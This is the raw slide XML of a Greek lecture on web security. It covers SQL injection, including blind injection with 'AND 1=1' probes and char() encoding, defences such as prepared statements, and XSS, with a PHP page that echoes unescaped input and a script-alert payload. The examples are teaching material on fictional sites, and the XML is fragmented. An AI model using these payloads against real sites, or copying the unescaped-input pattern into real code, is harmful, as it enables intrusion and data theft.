        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533291" y="0"/>
            <a:ext cx="4077416" cy="5143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Παραδείγματα SQL επιθέσεων</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Shape 22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Ανάλογα με το σύστημα βάσης δεδομένων που στοχεύουμε μπορούμε:</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Να διαχειριστούμε τα δεδομένα</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Να αλλάξουμε το σχήμα της βάσης</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Να χρησιμοποιήσουμε built-in functions</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Να χρησιμοποιήσουμε stored procedures</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Να παραποιήσουμε τις ρυθμίσεις ασφαλείας της βάσης</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Να υποκλέψουμε τα δεδομένα με αποστολή στο email μας</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Παραδείγματα SQL επιθέσεων</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 22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Πολύ συχνά οι χαρακτήρες ' και '' φιλτράρονται.</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Αυτό θα αποτρέψει τις περισσότερες επιθέσεις με SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Αλλά το πρόβλημα παραμένει στην περίπτωση που οι χαρακτήρες ' και '' δεν είναι απαραίτητοι.</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SELECT * FROM users WHERE id=1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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For real pros, χρησιμοποιείστε τη συνάρτηση ''char'' στον SQL Server.</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INSERT INTO users values(42,char(0x63)+char(0x65)...) </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Στοχεύοντας στα σφάλματα</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 23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Ο εισβολέας αναγκάζει την εφαρμογή να παράξει ένα σφάλμα.</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Τα σφάλματα που επιστρέφονται μπορούν να αποδειχθούν ιδιαίτερα χρήσιμα καθώς περιέχουν πληροφορίες σχετικές με τον τρόπο λειτουργίας της εφαρμογής και την κατάσταση της βάσης.</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Χρήση τεχνικών από side channel attacks.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pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340925" y="581275"/>
            <a:ext cx="6211775" cy="40938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pic>
        <p:nvPicPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="207712"/>
            <a:ext cx="9143998" cy="472807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Blind SQL Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Shape 24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O στόχος είναι το news portal www.albuquerquenews.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Ένα δελτίο τύπου είναι προσβάσιμο μέσω της διεύθυνσης</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http://www.albuquerquenews.com/press_release.php?id=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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To query που εκτελείται στην βάση είναι:</a:t>
            </a:r>
          </a:p>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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT title, desc FROM pressReleases WHEN id=5;</a:t>
            </a:r>
          </a:p>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Τυχόν μηνύματα λάθους φιλτράρονται από την εφαρμογή.</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Πως μπορούμε να εκτελέσουμε τα δικά μας queries στην βάση παραβιάζοντας την ασφάλεια της εφαρμογής;</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Ασφάλεια web εφαρμογών</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1641000"/>
            <a:ext cx="8229600" cy="18615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Ακόμα και ασφαλείς ιστοσελίδες που χρησιμοποιούν πρωτόκολλα κρυπτογραφημένης επικοινωνίας (SSL) δέχονται κακόβουλα HTTP requests δίχως έλεγχο.</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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1109325"/>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Ζητάμε από την εφαρμογή την διεύθυνση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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/press_release.php?id=5 AND 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Το query που θα εκτελεστεί είναι:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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SELECT * FROM PressReleases WHERE id=5 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>AND 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-2286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							</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Εάν υπάρχει SQL injection vulnerability, θα πρέπει να επιστραφεί το </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ίδιο </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>δελτίο τύπου.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Αν η επικύρωση του αιτήματος ήταν σωστή, το </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'id=5 AND 1=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> θα ερμηνεύονταν σαν μια τιμή και δεν θα επιστρέψει αποτέλεσμα.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Shape 25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Blind SQL Injections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Exploit of a Mom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="261" name="Shape 261"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1400175" y="1595437"/>
            <a:ext cx="6343650" cy="19526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pic>
        <p:nvPicPr>
          <p:cNvPr id="266" name="Shape 266"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="213225"/>
            <a:ext cx="7146160" cy="4717049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978625" y="4539350"/>
            <a:ext cx="3955500" cy="465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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>http://seclists.org/fulldisclosure/2011/Mar/309</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Προστασία από SQL Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 27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Τα SQL statements πρέπει να εκτελούνται μέσω ασφαλών interfaces όπως </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>prepared statements, stored procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> και φυσικά οι μη επιτρεπτοί χαρακτήρες πρέπει να φιλτράρονται (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mysql_real_escape_string </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>στην PHP).</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Οι ασφαλείς μηχανισμοί επικοινωνίας με τη βάση κάνουν precompile τα SQL statements πριν την προσθήκη των δεδομένων εισόδου του χρήστη.</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Η καλύτερη προστασία είναι η απομόνωση του business logic της εφαρμογής από την SQL και τα δεδομένα.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852911" y="1355400"/>
            <a:ext cx="3438173" cy="3438173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="708666"/>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lang="el"/>
              <a:t>Δ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ιάλειμμα 10 λ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>επτά</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a: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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site Scripting</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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1139225"/>
            <a:ext cx="8229600" cy="3725698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="45720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Browser vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Λάθη υλοποίησης στο client side κώδικα.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="45720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Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="45720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JavaScript sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Εμποδίζεται η πρόσβαση στη μνήμη άλλων προγραμμάτων και στο σύστημα αρχείων.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Πρόσβαση μόνο στο τρέχον document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="45720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Security policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Same origin policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 29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Σύνοψη</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pic>
        <p:nvPicPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715148" y="1994125"/>
            <a:ext cx="2840649" cy="2832474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 29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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 29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Είναι ένα token που στέλνεται από τον server και αποθηκεύεται στον client με μορφή “name=value”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0"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To HTTP είναι stateless.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0"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Συνεπώς χρησιμοποιούμε cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0"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Single domain attribute.</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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 30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55600" lvl="0" marL="45720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Persistent cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Ζουν για πολλαπλά browser sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Η ημερομηνία λήξης τους ορίζεται από τον server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="45720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Non-persistent cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Διαρκούν όσο το browser session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="45720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Secure cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Στέλνονται μόνο σε κρυπτογραφημένες συνδέσεις (SSL).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100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HttpOnly cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Στέλνονται μόνο σε HTTP και HTTPS requests και δεν είναι προσβάσιμα από την javascript στον browser.</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Same origin policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 30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Ένα origin καθορίζεται από το server, το πρωτόκολλο και το port number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Πρόκειται για το domain από το οποίο κατέβηκε το περιεχόμενο της σελίδας.</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Tα scripts μπορούν να έχουν πρόσβαση μόνο σε πόρους (π.χ. cookies)  του ίδιου domain.</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Βασική πολιτική για μη αξιόπιστο κώδικα JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Απαγορεύει στα κακόβουλα scripts να χειρίζονται άλλες σελίδες στο πρόγραμμα περιήγησης και εμποδίζει την υποκλοπή δεδομένων.</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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411600" y="2245800"/>
            <a:ext cx="8320800" cy="6518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t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="3000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ο κώδικας σας είναι μέρος της περιμέτρου ασφαλείας της εφαρμογής.</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Τι δεν περιορίζεται</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 31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55600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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&lt;script src="..."/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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&lt;img/video src="..."/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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&lt;a href="..."/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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υποβολή φόρμας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iframes</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Παράκαμψη του same origin policy.</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Ο εισβολέας στέλνει το κακόβουλο script σε μια σελίδα “θύμα”.</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O browser του χρήστη δεν έχει κανέναν τρόπο να γνωρίζει ότι το script δεν είναι αξιόπιστο, και το εκτελεί.</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Το κακόβουλο script μπορεί να έχει πρόσβαση σε οποιαδήποτε cookies, session tokens, ή άλλες ευαίσθητες πληροφορίες που διατηρούνται στον browser και χρησιμοποιούνται σε αυτή τη σελίδα.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 32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Cross-Site Scripting - XSS</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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1029062"/>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&lt;h1&gt;</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  &lt;?php echo “Welcome ” . $_GET[‘user’] ?&gt;</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&lt;/h1&gt;</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Ο χρήστης επισκέπτεται την αρχική σελίδα της εφαρμογής.</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http://www.polloshermanos.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/index.php?user=’Heisenberg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 32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DOM based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136200" y="3372812"/>
            <a:ext cx="4614449" cy="15244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DOM based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="956162"/>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&lt;h1&gt;</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  &lt;?php echo “Welcome ” . $_GET[‘user’] ?&gt;</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&lt;/h1&gt;</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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Η πρώτη XSS επίθεση.</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http://www.polloshermanos.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/index.php?user=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(‘Say my name!’);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2666824" y="3563875"/>
            <a:ext cx="3717400" cy="136217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Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 34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Μια reflected XSS επίθεση φτάνει στα θύματα μέσω εναλλακτικών διαδρομών, όπως ένα email ή μια ιστοσελίδα που ελέγχεται από τον εισβολέα.</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http://www.madrigal_electromotive.org/search?query=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
